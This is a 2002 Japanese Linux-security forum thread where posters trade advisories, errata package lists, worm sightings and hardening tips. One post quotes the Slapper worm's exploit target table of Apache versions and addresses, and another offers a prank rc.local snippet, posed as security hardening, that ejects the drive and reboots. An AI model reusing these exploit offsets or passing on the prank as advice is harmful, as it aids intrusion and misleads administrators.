125 名前:login:Penguin [02/07/29 12:39 ID:6tjxSffv.net] Jul 29 02:47:04 XXXXX sshd[14409]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(host180.cciglobal.net.pa) failed これはresolverの穴を狙った攻撃?
126 名前:login:Penguin mailto:sage [02/07/29 16:57 ID:Nqm0H4Dg.net] 接続元のIPアドレスからホスト名を調べて、そこからまたIPアドレスを ひいたら元に戻らなかった、ってことだと思う。>>124 のものも、 うちに来ているものも、DNSでAレコードがひけないんだよね。 Jul 28 04:45:35 giko sshd[80120]: warning: /etc/hosts.allow, line 4: can't verify hostname: getaddrinfo(h64-141-4-23.bigpipeinc.com, AF_INET) failed Jul 28 04:45:35 giko sshd[80120]: refused connect from 64.141.4.23 (64.141.4.23) % host 64.141.4.23 23.4.141.64.in-addr.arpa domain name pointer h64-141-4-23.bigpipeinc.com. % host h64-141-4-23.bigpipeinc.com Host h64-141-4-23.bigpipeinc.com not found: 3(NXDOMAIN) 詳しく調べたわけでないから嘘かもしれぬ。スマソ。
127 名前:login:Penguin [02/07/29 18:09 ID:qwCj4iNe.net] >>124 攻撃そのものは単純にsshdの古いバージョンでのセキュリティホール を狙った物だと思う。偶然にもIPから逆引きできたホスト名と、その ホスト名に対応するIPが合致していなかったために拒否されただけ。
128 名前:login:Penguin [02/07/30 23:43 ID:OrlpKdAp.net] マタキタ━━━━━━(゚∀゚)━━━━━━ !!! OpenSSL にリモートから悪用可能なバッファオーバフロー。 既に赤帽と Woody には修正出た。でも Potato はまだ。 util-linux にもちっこい穴。
129 名前:login:Penguin [02/07/31 11:36 ID:RHIhvYC4.net] CERTキタ━━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━━━!!!!! www.cert.org/advisories/CA-2002-23.html
130 名前:login:Penguin [02/07/31 13:00 ID:4XI2cpUc.net] Vine Linux 2.5/2.1.5 向け修正キタ━━(゚∀゚)━━━!!!!! ・2002,07,31 openssl にセキュリティホール
131 名前:login:Penguin [02/07/31 14:06 ID:ihwnQ9C/.net] 07/31 Vine-errata security hole openssl-0.9.6b-1vl5.i386.rpm openssl-devel-0.9.6b-1vl5.i386.rpm openssl-perl-0.9.6b-1vl5.i386.rpm
132 名前:login:Penguin [02/07/31 20:42 ID:YlVAcS0a.net] Turboにglibc、imap、artsのパッチ出てます。
133 名前:login:Penguin [02/07/31 22:04 ID:VJrOgCEJ.net] openss-0.9.6eをmake installしたら /usr/bin/pod2manがうまくいかね−とか言って 「自前の古いやつで代用しとくよん」とか言われるんだが perlはperl-5.00503-12が入っている /usr/bin/pod2manは 29017 Aug 11 2000 /usr/bin/pod2man 赤帽6.2, kernel2.2.19-6.2.16 なんで?
134 名前:login:Penguin [02/07/31 22:23 ID:Q67jwc8B.net] >>131 imap のってかなり前から判明してて悪用ツールも出回ってるのに、 赤帽は無視状態なんだよなぁ。
135 名前:login:Penguin mailto:sage [02/08/01 00:00 ID:HYtIqah4.net] >>132 鷲もSolaris8(SPARC版)で同じようなエラーでまくった。
136 名前:login:Penguin mailto:sage [02/08/01 04:58 ID:K+qKORMj.net] >>132 FreeBSD 4.6-STABLEで同じエラーが出たが, PlamoLinux 2.2.6では出なかった
137 名前:135 mailto:sage [02/08/01 05:03 ID:K+qKORMj.net] ちなみに FreeBSD: -r-xr-xr-x 1 root wheel 29017 Sep 26 2000 /usr/bin/pod2man Linux: -rwxr-xr-x 1 root root 28830 Jul 23 1999 /usr/bin/pod2man*
138 名前:OpenSSHにトロイ [02/08/02 00:12 ID:INRnoZ0d.net] docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
139 名前:132 mailto:sage [02/08/02 11:13 ID:ODee0oiA.net] ヨー分からんが、どうせマニュアルだしとおもって とりあえず無視して続行した 情報あんがと>>134 , 135
140 名前:login:Penguin [02/08/02 11:37 ID:Ybd6oZe9.net] >137 祭りのヨカーン うちは大丈夫だったーよ。
141 名前:名無しさん@Emacs [02/08/02 12:53 ID:00MO2/Lt.net] >>137 祭りネタキタ━━━━━━(゚∀゚)━━━━━━ !!!!! いや、うちは全く問題なかったんだけど。 いちおうcertのほうのリンクも。 www.cert.org/advisories/CA-2002-24.html
142 名前:login:Penguin [02/08/02 13:02 ID:1fOWog9y.net] 因紫 掻 薄仙 尻衣馬形壱 馬澗 紫戚闘拭 奄沙 凪戚走亜 蒸柔艦陥. 穣益傾戚球馬澗 掻析 呪 赤柔艦陥. 陥製拭 陥獣 背左淑獣神. 庚薦亜 域紗鞠檎 瀬 紫戚闘 淫軒切拭惟 庚税馬淑獣神. これってなんて書いてあるの?ルータのログみたら外からローカルの アドレス参照しようとしてたみたいなんだけど。
143 名前:141 [02/08/02 13:03 ID:1fOWog9y.net] 参照元のURL見に行ったら書いてあった。
144 名前:login:Penguin [02/08/02 20:01 ID:8Z+yUGrL.net] キタ━━━━━━(゚∀゚)━━━━━━ !!!!! sunrpc にリモートな穴 www.isskk.co.jp/support/techinfo/general/SunRPC_xforce.html glibcおそらくダメ。パッチ前のコードとおんなじ。
145 名前:login:Penguin [02/08/02 20:07 ID:8Z+yUGrL.net] cvsは変更されている。
146 名前:login:Penguin [02/08/02 20:42 ID:Fjm5fo+C.net] >>143 俺的にはネットに sunrpc を露出させてる事自体が非常識だと思うが、 実際にはそういう鯖がいっぱいあるんだろうな。 Debian ですらデフォルトで sunrpc が動いてる。
147 名前:login:Penguin [02/08/03 22:31 ID:iNHan/6D.net] >>145 libwrap組み込みのportmapperはまだマシ。 Solarisのやつはアクセス制限ないからね
148 名前:login:Penguin mailto:sage [02/08/03 22:43 ID:iYyATlBv.net] >>145 ルータで塞いでるから、ネットに晒してるのはあまり無い気がするが、 それでも内部からだと叩かれまくるよな。
149 名前:login:Penguin [02/08/03 23:03 ID:q+uK3qOu.net]
150 名前:Kーソ。NFS鯖もだめっぽ? [] [ここ壊れてます]
151 名前:login:Penguin mailto:sage [02/08/04 02:40 ID:mTLJthdl.net] Port111、iptablesでrejectしとこっと
152 名前:login:Penguin [02/08/08 08:04 ID:GKTZUhh4.net] 08/07 Vine-errata security hole apache-1.3.26-0vl3.i386.rpm apache-devel-1.3.26-0vl3.i386.rpm apache-manual-1.3.26-0vl3.i386.rpm mod_ssl-2.8.7-0vl3.i386.rpm
153 名前:login:Penguin [02/08/08 08:06 ID:GKTZUhh4.net] 08/07 Vine-errata security hole libpng-1.0.12-0vl3.i386.rpm libpng-devel-1.0.12-0vl3.i386.rpm
154 名前:OpenSSL0.9.6f [02/08/09 14:31 ID:BghTOrfj.net] キタ━━━━━━(゚∀゚)━━━━━━ !!!!! www.openssl.org/
155 名前:あぼーん mailto:あぼーん [あぼーん.net] あぼーん
156 名前:login:Penguin [02/08/09 14:59 ID:4tlTdlJW.net] >>152 またopensslに依存するのをビルドしなおしかよ・・メンドクセー
157 名前:OpenSSL0.9.6f [02/08/09 15:10 ID:BghTOrfj.net] >>154 朝からWin2kのSP3(板違いスマソ)もいれたし、 次はコレかよって感じだよ....ウワヮヮン ヽ(`Д´)ノ
158 名前:名無しさん@XEmacs mailto:sage [02/08/09 15:19 ID:QtBVDpro.net] あうん。 OpenSSL は、ちと面倒だよね。。。
159 名前:login:Penguin [02/08/09 15:21 ID:8WrLJci1.net] make installでコケるぞ。0.9.6g出んのかな marc.theaimsgroup.com/?l=openssl-cvs&m=102849375109205&w=2
160 名前: [02/08/09 19:13 ID:o+8My8IY.net] カンプールのインド工科大学のManindra Agrawal、Neeraj KayalおよびNitin Saxenaが、 素数判定を多項式時間(polynomial time)で可能なアルゴリズムを発見、証明した。 素数判定(が困難であること)は、RSAをはじめとする多くのコンピュータ暗号が安全である ことを保障しているため、もしこれが事実であった場合、コンピュータ暗号の世界に多大な 影響を及ぼすと予想される。 論文は以下のURLからたどることができる。 また、ニューヨークタイムズの記事によると、ベル研のDr. Carl Pomerance博士は この論文を正確(correct)であると断定し、「このアルゴリズムは美しい。」 ("This algorithm is beautiful.")とコメントしたという。 論文のURL(英語: 数学者の写真あり): www.cse.iitk.ac.in/news/primality.html NY Timesの記事(英語): www.nytimes.com/2002/08/08/science/08MATH.html 関連スレ 【科学】素数判定が多項式時間で可能、コンピュータ暗号に影響大―インドの数学者証明 news2.2ch.net/test/read.cgi/newsplus/1028876818/ 素数判定は「決定的」多項式時間で可能 science.2ch.net/test/read.cgi/math/1028813059/ もうだめぽ、、
161 名前:login:Penguin mailto:sage [02/08/09 19:23 ID:8xcqN05M.net] 地味なタコ式祭りが発生しているが... 当面 RSA には影響なさげ。
162 名前:login:Penguin mailto:sage [02/08/09 19:27 ID:8xcqN05M.net] >素数判定(が困難であること)は、RSAをはじめとする... RSA の基盤は「素因数分解(が困難であること)」だバカモノ。
163 名前:login:Penguin mailto:sage [02/08/09 19:44 ID:o+8My8IY.net] >>160 素数判定は楽にできるようになったけど、 依然として素因数分解は困難であるということ?
164 名前:login:Penguin mailto:sage [02/08/09 19:49 ID:8xcqN05M.net] >>161 アルゴリズムを素因数分解に応用できるかどうかは今の所未知数。 ていうか今のところ関係無し。でも数学好きにはたまらんネタだろうな。
165 名前:login:Penguin mailto:sage [02/08/09 21:03 ID:o+8My8IY.net] >>162 ども。 とりあえず、あわてることはなさそうですね。
166 名前:login:Penguin mailto:sage [02/08/10 08:00 ID:nkdobe6F.net] こういう時数学的素養がない漏れはツライ...
167 名前:login:Penguin mailto:sage [02/08/11 00:52 ID:Bp+ly3tB.net] 8月中に色々出そうなヨカーン
168 名前:login:Penguin [02/08/11 05:59 ID:cqQ7h8Qr.net] opensslは0.9.6gか・・・ この手のライブラリは頻繁にバージョンアップされたら泣けてくる・・・ 今、0.9.6e使ってるんだけど、セキュリティ問題あんのかな? うちではbuildは素直に通ったんだけど・・・これ絡みの修正なら放置したい・・・
169 名前:login:Penguin [02/08/11 08:43 ID:uKejT2NS.net] >>166 openssl 0.9.6eはバグ入りです。これあてないと駄目。なんで0.9.6fとか openssl advisoryが出ないのか不思議です。 marc.theaimsgroup.com/?l=openssl-cvs&m=102831422608153&w=2 セキュリティーホールmemoから引用
170 名前:166 [02/08/11 15:42 ID:cqQ7h8Qr.net] >>167 THX アップデートしておいた方がよさげかな(泣
171 名前:login:Penguin mailto:sage [02/08/12 10:36 ID:/vXwCwY1.net] これって 6.2 も BIND 9.x に上げろ、ってこと? rhn.redhat.com/errata/RHSA-2002-133.html
172 名前:login:Penguin mailto:login:Penguin [02/08/12 11:41 ID:9+/01gLs.net] もう、openssl0.9.6gでてるよ。 opensshとかapacheとか、makeしなおしかよー
173 名前:login:Penguin mailto:sage [02/08/12 14:32 ID:CpjzB4Ow.net] >>170 スタティックリンクしてるのか?
174 名前:login:Penguin mailto:login:Penguin [02/08/12 15:28 ID:9+/01gLs.net] sharedでmakeしてるときって、再起動だけでいいんですか? ldd /usr/sbin/sshd してみたら、 libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000) という風になってて、 このlibcrypto.so.3 は古いライブラリだったんですよね。 新しいのは libcrypto.so.2 なんですけど・・・・
175 名前:login:Penguin mailto:sage [02/08/12 16:38 ID:e6gR74Zh.net] 海胆板とクロスポストかよ おめでてえな
176 名前:login:Penguin [02/08/13 22:00 ID:Lm+jD2sp.net] >>171 お前馬鹿だなぁ。ダイナミックリンクでも新しいバージョン入れて再起動しないとダメだよ。
177 名前:login:Penguin [02/08/13 23:10 ID:OgpeoNS6.net] >>172 入れ換えて再起動するだけでいい。そのためのシェアードライブラリ。 そのへんがよく判ってない人は RPM に頼るほうが安全だよ。
178 名前:login:Penguin mailto:sage [02/08/13 23:49 ID:HzHkL5P0.net] rpm だと, シェアードライブラリを入れ変えると, link してる daemon を再起動してくれるもんなの? なんかすごそう.
179 名前:login:Penguin mailto:sage [02/08/13 23:53 ID:42AXx8EM.net] >>176 してくれないんでない? OpenSSL の Advisory では「リブートしろ」って書いてある。 rhn.redhat.com/errata/RHSA-2002-160.html
180 名前:login:Penguin [02/08/14 00:33 ID:zJGAdpS8.net] >>176 いや、そこまではやってくれないよ。 シェアードにしたつもりで出来てなかった、とかの失敗が無くなるだけ。 それに >>177 が書いてるように、アドバイザリに必要な作業が載る。 でも Debian で glibc 入れ換えると片っ端から再起動してくれて驚く。
181 名前:login:Penguin mailto:sage [02/08/14 07:06 ID:s4Wd/65X.net] >178 /sbin/init も?
182 名前:login:Penguin [02/08/14 11:21 ID:xh4yp2uP.net] >>179 Debian で /sbin/init を再起動してくれるかどうかは確かめてない。 でも赤帽でも init は再起動してくれるくらいだから、やってるんじゃない?
183 名前:login:Penguin mailto:sage [02/08/18 01:02 ID:dpWasehA.net] >>179 postinst で init u してるのを発見
184 名前:login:Penguin [02/08/25 02:51 ID:u07j5rfK.net] 08/15 Vine-errata security hole mozilla-1.0.0-9vl9.i386.rpm mozilla-chat-1.0.0-9vl9.i386.rpm mozilla-devel-1.0.0-9vl9.i386.rpm mozilla-dom-inspector-1.0.0-9vl9.i386.rpm mozilla-js-debugger-1.0.0-9vl9.i386.rpm mozilla-mail-1.0.0-9vl9.i386.rpm mozilla-nspr-1.0.0-9vl9.i386.rpm mozilla-nspr-devel-1.0.0-9vl9.i386.rpm mozilla-nss-1.0.0-9vl9.i386.rpm mozilla-nss-devel-1.0.0-9vl9.i386.rpm mozilla-psm-1.0.0-9vl9.i386.rpm
185 名前:login:Penguin [02/08/25 02:51 ID:u07j5rfK.net] 08/25 Vine-errata security hole util-linux-2.11n-4vl6.i386.rpm mount-2.11n-4vl6.i386.rpm losetup-2.11n-4vl6.i386.rpm
186 名前:login:Penguin [02/08/26 23:12 ID:8KXm86HS.net] >>181 なるほど。 Red Hat だと glibc に付属の glibc_post_upgrad
187 名前:e を実行してたよ。 [] [ここ壊れてます]
188 名前:login:Penguin mailto:sage [02/08/29 11:09 ID:9F1pybQo.net] 古いので sage service.real.com/help/faq/security/bufferoverrun.html service.real.com/help/faq/security/clipsource.html
189 名前:login:Penguin [02/09/14 13:13 ID:B9dlUKMe.net] Linux.Slapper.Worm slashdot.jp/article.pl?sid=02/09/14/033203&mode=thread
190 名前:4も学割野朗 ◆4GET/.F. [02/09/14 23:20 ID:jwopavyL.net] www.zakzak.co.jp/top/top0914_3_26.html 俺にとっては他人事じゃなかったりするわけだが。
191 名前:4も学割野朗 ◆4GET/.F. [02/09/14 23:22 ID:jwopavyL.net] 間違えた。こっちが正しい。 www.zakzak.co.jp/top/t-2002_09/3t2002091403.html 知らない間にNASAにハッキング… 愛知の会社員になりすまして攻撃 愛知県知立市の会社員(31)が自宅で所有するパソコンが8月、ケーブルテレビ局のインターネット回線を経由して 何者かに勝手に遠隔操作され、米航空宇宙局(NASA)の施設「ジェット推進研究所」のコンピューターにハッカー攻撃をしていたことが14日までに分かった。
192 名前:login:Penguin mailto:sage [02/09/14 23:24 ID:xbXyt3h1.net] これって、UNIX系OS入れてたってことなのかな? それとも、Win2000?
193 名前:4も学割野朗 ◆4GET/.F. mailto:sage [02/09/14 23:26 ID:jwopavyL.net] >>189 ウィンやマックじゃないって書いてあるからUNIX系だと思われ。
194 名前:login:Penguin mailto:sage [02/09/14 23:35 ID:xbXyt3h1.net] >>190 さんくす。 朝日の記事しか読んでなかった。zakuzakuには書いてあったんだね。
195 名前:login:Penguin mailto:sage [02/09/15 00:03 ID:s5g/JVKr.net] おまえらはそもそも軽く考えてサーバ建てすぎ。 まぁこのスレに来る連中はまだいいほうだな。 少なくとも「セキュリティ」という単語を知ってる。
196 名前:login:Penguin [02/09/15 00:10 ID:/sdc7+j+.net] >>192 鯖は建てましたがワールドワイドには繋いでません。
197 名前:CRYPTO-GRAM, September 15 [02/09/16 17:43 ID:qCuGZIi/.net] AES may have been broken. Serpent, too.
198 名前:login:Penguin [02/09/17 10:46 ID:FczQ6EGn.net] Linuxサーバを襲う新手のワーム www.zdnet.co.jp/news/0209/17/nebt_05.html
199 名前:login:Penguin mailto:sage [02/09/17 11:07 ID:f9VI4nxX.net] >>195 それがまるっきり来ないんだよ。TCP 443 を叩いてもくれない。 既に絶滅したかも。来るのは MS SQL のワームばかり。
200 名前:login:Penguin mailto:sage [02/09/17 11:32 ID:FczQ6EGn.net] だよな。普通にアップデートしていたら穴は塞がってるし。 漏れもくだ質のヤツしか見た事無い。 pc.2ch.net/test/read.cgi/linux/1031670376/386
201 名前:login:Penguin mailto:sage [02/09/17 13:18 ID:e3Zfg2Kx.net] 最近、https 公開していないサーバに 2 回ほど 443/tcp アクセスがあったよ。まだ Worm は知ら なかったから(゜Д゜)ハァ? と思ったけど。 9/13 17:05:20 と 9/14 19:17:00 に 1 回ずつ SYN が来てた。 1433/tcp に埋もれて見落しそうになる(w
202 名前:from bugtraq.c [02/09/17 14:42 ID:f9VI4nxX.net] オリジナルの Slapper のターゲット。 struct archs { char *os; char *apache; int func_addr; } architectures[] = { {"Gentoo", "", 0x08086c34}, {"Debian", "1.3.26", 0x080863cc}, {"Red-Hat", "1.3.6", 0x080707ec}, {"Red-Hat", "1.3.9", 0x0808ccc4}, {"Red-Hat", "1.3.12", 0x0808f614}, {"Red-Hat", "1.3.12", 0x0809251c}, {"Red-Hat", "1.3.19", 0x0809af8c}, {"Red-Hat", "1.3.20", 0x080994d4}, {"Red-Hat", "1.3.26", 0x08161c14}, {"Red-Hat", "1.3.23", 0x0808528c}, {"Red-Hat", "1.3.22", 0x0808400c}, {"SuSE", "1.3.12", 0x0809f54c}, {"SuSE", "1.3.17", 0x08099984}, {"SuSE", "1.3.19", 0x08099ec8}, {"SuSE", "1.3.20", 0x08099da8}, {"SuSE", "1.3.23", 0x08086168}, {"SuSE", "1.3.23", 0x080861c8}, {"Mandrake", "1.3.14", 0x0809d6c4}, {"Mandrake", "1.3.19", 0x0809ea98}, {"Mandrake", "1.3.20", 0x0809e97c}, {"Mandrake", "1.3.23", 0x08086580}, {"Slackware", "1.3.26", 0x083d37fc}, {"Slackware", "1.3.26",0x080b2100} };
203 名前:login:Penguin mailto:sage [02/09/17 16:23 ID:Noq0z9Is.net] >>198 9/14が最初で毎日2〜3回づつ来てるよ。
204 名前:login:Penguin [02/09/17 16:34 ID:f9VI4nxX.net] >>200 アドレスのスキャン方法によって来る IP と来ない IP があるのかな?
205 名前:login:Penguin [02/09/18 19:16 ID:V7u05Yz6.net] >>201 まず 80 番にアクセスして対象となる Apache を探す。 だから 443 にはアクセスが無い事もある。 GET / HTTP/1.1 してすぐに逃げてく奴が妖しい。 基本的にこないだの Apache のワームの改造版らしいね。
206 名前: [02/09/22 02:03 ID:0Va9RvOb.net] RSAよりも強固な楕円暗号のフリーソースがたしかサンから放出される という噂を聞いたが、それは取り込まれるのかな?
207 名前:login:Penguin mailto:sage [02/09/22 02:37 ID:fw5votXq.net] >>203 Linuxに取り込むことは無いだろうが、OpenSSLにはすでに提供済みとのこと。 じきにOpenSSHやGPGなどに取り込まれるじゃないかな?
208 名前:名無しさん@Meadow [02/09/22 02:59 ID:v9Q7KCox.net] これね。 japan.cnet.com/Enterprise/News/2002/Item/020920-3.html OpenSSLで使われるならBSDライセンスになるでしょ。 なら、GPLで汚染することも可能(藁。
209 名前:login:Penguin mailto:sage [02/09/22 03:01 ID:3+1dfxia.net] >>199 じゃ、ここらへん偽っとくと、昆虫採集できるの?
210 名前:login:Penguin [02/09/22 03:09 ID:lAUJfl5L.net] RedHat7.3を使ってWEBサーバにしています。 セキュリティ対策として ・毎日一回up2date実行 ・IPTABLES ・snort ・tripwire をしています。 ほかに導入すべきソフトや対策あったら教えていただけますでしょうか。
211 名前:login:Penguin [02/09/22 15:30 ID:ZMoD+eSk.net] >>207 ログの監視は必須。これは一番最初にやるべき事だ。 必要ないプログラムを止め、削除する。不用な Apache のモジュールも。 確実に信用できる奴以外はログインさせない、アカウントを作らない。 サーバへのログイン、管理は SSH や SSL 等、盗聴に強いものを使う。 あとはサーバ自身より中味の問題。 CGI 等の Web アプリケーションに注意すべきだ。非常に穴が多い。 どこからか拾って来た CGI スクリプトは決してインストールしない。 クロスサイトスクリプティング脆弱性についても注意が必要だ。 こんなもんだろ。 もっとやりたいパラノイア君には、他にも出来る事が沢山ある。 ピアソンの「Linux セキュリティトータルガイド」一読を薦める。
212 名前:login:Penguin mailto:sage [02/09/22 15:49 ID:ZMoD+eSk.net] >>206 絶滅危惧種だから天然ものは簡単には捕まらないぞ。
213 名前:login:Penguin mailto:sage [02/09/22 17:24 ID:oJW7ac5g.net] >>209 なんだ、養殖モノしか捕まらないのか... (´・ω・)ショボーン
214 名前:login:Penguin mailto: [02/09/26 16:12 ID:Q23MY6o0.net] 最新版であるxfree86 4.2.1までのバージョンで libX11.soライブラリの脆弱性によって
215 名前:ローカルユーザーに任意のプログラムを実行される可能性がある http://www.xfree86.org/security/ [] [ここ壊れてます]
216 名前:login:Penguin mailto:sage [02/09/26 16:18 ID:pqbC9pgT.net] >>211 それって suid root の X クライアントが無いと悪用不可能な気がする。
217 名前:login:Penguin mailto:sage [02/09/27 01:41 ID:lhdC2Dp9.net] >>212 xtermはしっかりsuid root。
218 名前:login:Penguin [02/10/03 01:04 ID:OsvGBspG.net] 10/03 Vine-errata security hole postgresql-7.2.2-0vl3.i386.rpm postgresql-contrib-7.2.2-0vl3.i386.rpm postgresql-devel-7.2.2-0vl3.i386.rpm postgresql-docs-7.2.2-0vl3.i386.rpm postgresql-jdbc-7.2.2-0vl3.i386.rpm postgresql-libs-7.2.2-0vl3.i386.rpm postgresql-odbc-7.2.2-0vl3.i386.rpm postgresql-perl-7.2.2-0vl3.i386.rpm postgresql-python-7.2.2-0vl3.i386.rpm postgresql-server-7.2.2-0vl3.i386.rpm postgresql-tcl-7.2.2-0vl3.i386.rpm postgresql-tk-7.2.2-0vl3.i386.rpm
219 名前:login:Penguin [02/10/03 01:05 ID:OsvGBspG.net] 10/03 Vine-errata security hole namazu-2.0.12-0vl1.i386.rpm namazu-devel-2.0.12-0vl1.i386.rpm
220 名前:login:Penguin [02/10/03 01:05 ID:OsvGBspG.net] 10/03 Vine-errata security hole XFree86-4.2.1-0vl4.i386.rpm XFree86-100dpi-fonts-4.2.1-0vl4.i386.rpm XFree86-75dpi-fonts-4.2.1-0vl4.i386.rpm XFree86-Xnest-4.2.1-0vl4.i386.rpm XFree86-Xvfb-4.2.1-0vl4.i386.rpm XFree86-cyrillic-fonts-4.2.1-0vl4.i386.rpm XFree86-devel-4.2.1-0vl4.i386.rpm XFree86-doc-4.2.1-0vl4.i386.rpm XFree86-gl-4.2.1-0vl4.i386.rpm XFree86-gl-devel-4.2.1-0vl4.i386.rpm XFree86-legacy-4.2.1-0vl4.i386.rpm XFree86-libs-4.2.1-0vl4.i386.rpm XFree86-tools-4.2.1-0vl4.i386.rpm XFree86-twm-4.2.1-0vl4.i386.rpm XFree86-xdm-4.2.1-0vl4.i386.rpm XFree86-xf86cfg-4.2.1-0vl4.i386.rpm XFree86-xfs-4.2.1-0vl4.i386.rpm
221 名前:login:Penguin [02/10/03 01:05 ID:OsvGBspG.net] 10/03 Vine-errata security hole python-1.5.2-28vl4.i386.rpm python-devel-1.5.2-28vl4.i386.rpm python-docs-1.5.2-28vl4.i386.rpm python-tools-1.5.2-28vl4.i386.rpm tkinter-1.5.2-28vl4.i386.rpm
222 名前:login:Penguin [02/10/03 01:06 ID:OsvGBspG.net] 10/03 Vine-errata security hole xchat-1.8.10-0vl1.i386.rpm
223 名前:login:Penguin [02/10/03 01:12 ID:T2cHE8PV.net] >>213 それは古い常識。
224 名前:login:Penguin [02/10/06 15:38 ID:kqhyD1Co.net] 数日前にでた Red Hat の glibc アップデート rhn.redhat.com/errata/RHSA-2002-197.html を当てると、MySQL が死ぬ事があるらしいぞ。 https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=75128
225 名前:login:Penguin [02/10/09 16:59 ID:GCLBywcm.net] Sendmailにトロイが仕込まれてたそうな。 www.cert.org/advisories/CA-2002-28.html
226 名前:login:Penguin [02/10/12 22:59 ID:AS/1mqsd.net] mainte
227 名前:login:Penguin mailto:sage [02/10/14 13:03 ID:Yr4D9drm.net] セキュリティを強化するために以下の行を /etc/rc.d/rc.localに追加してください eject eject -t eject eject -t eject eject -t eject echo "ご苦労" reboot
228 名前:openssh3.5age [02/10/15 03:19 ID:OdSSQrkP.net] しかし、こうトロイが続くと心配になるな・・・ make前にソース読むしかないのか?
229 名前:login:Penguin mailto:sage [02/10/19 11:04 ID:8jgklp6v.net] お前ら、アンチウイルスソフトでSophos以外で 個人利用が無料のものはありますか。
230 名前:login:Penguin mailto:sage [02/10/21 11:00 ID:geoyITgp.net] あるよ。
231 名前:login:Penguin [02/10/22 23:32 ID:v1mpEmk/.net] >>225 うんこしないよ
232 名前:login:Penguin [02/10/23 13:33 ID:9clkFO2S.net] 10/23 Vine-errata security hole webmin-1.000-1vl3.noarch.rpm
233 名前:login:Penguin mailto:sage [02/10/23 15:35 ID:W0Y2GjXD.net] >皆様、セキュリティホールは埋めとけよ ってことは>>1 生き埋めですか・・・?
234 名前:login:Penguin mailto:sage [02/10/23 16:13 ID:ZfPnlnd+.net] >>229 ごめん、どういう意味?
235 名前:login:Penguin [02/10/27 19:03 ID:DEU6FCX+.net] 10/27 Vine-errata security hole webmin-1.000-1vl5.noarch.rpm
236 名前:login:Penguin [02/10/27 19:06 ID:oH46f0cH.net] 「彼女のセキュリティホールがゆるい」が 埋められてしまったのを思い出したよ。。。
237 名前:login:Penguin [02/10/31 19:53 ID:tNyCeh9o.net] 10/31 Vine-errata security hole mozilla-1.1-0vl6.i386.rpm mozilla-chat-1.1-0vl6.i386.rpm mozilla-devel-1.1-0vl6.i386.rpm mozilla-dom-inspector-1.1-0vl6.i386.rpm mozilla-js-debugger-1.1-0vl6.i386.rpm mozilla-mail-1.1-0vl6.i386.rpm mozilla-nspr-1.1-0vl6.i386.rpm mozilla-nspr-devel-1.1-0vl6.i386.rpm mozilla-nss-1.1-0vl6.i386.rpm mozilla-nss-devel-1.1-0vl6.i386.rpm mozilla-psm-1.1-0vl6.i386.rpm
238 名前:login:Penguin [02/11/01 10:17 ID:oNzk19D1.net] 11/1 Vine-errata security hole 2.5/{i386,ppc,alpha} unzip-5.50-4vl1.i386.rpm unzip-5.50-4vl1.ppc.rpm unzip-5.50-4vl1.alpha.rpm 2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha} tar-1.13.25-8vl3.i386.rpm tar-1.13.25-8vl3.ppc.rpm tar-1.13.25-8vl3.alpha.rpm
239 名前:login:Penguin [02/11/11 22:18 ID:lWjYmx1J.net] またglibc入れ替えでつか・・ www.kb.cert.org/vuls/id/IAFY-5FKJ33
240 名前:login:Penguin [02/11/12 19:35 ID:IbLfzr3s.net] Vine Linux 2.5/2.6 向け ・2002,11,12 XFree86 のメモリリーク修正、ドライバ更新 [2.6/{i386,ppc}] ・2002,11,12 kernel のバグ修正 [2.6/{i386
241 名前:}] ・2002,11,12 apache, mod_ssl にセキュリティホール [2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}] ・2002,11,12 openssl にセキュリティホール [2.5/{i386,ppc,alpha}] ・2002,11,12 gv にセキュリティホール [2.5/{i386,ppc} 2.6/{i386,ppc}] [] [ここ壊れてます]
242 名前:login:Penguin [02/11/14 11:04 ID:hDcsnf62.net] 11/14 Vine-errata security hole WindowMaker-0.80.2-0vl1.i386.rpm WindowMaker-libs-0.80.2-0vl1.i386.rpm WindowMaker-devel-0.80.2-0vl1.i386.rpm (´・ω・`)ショボーン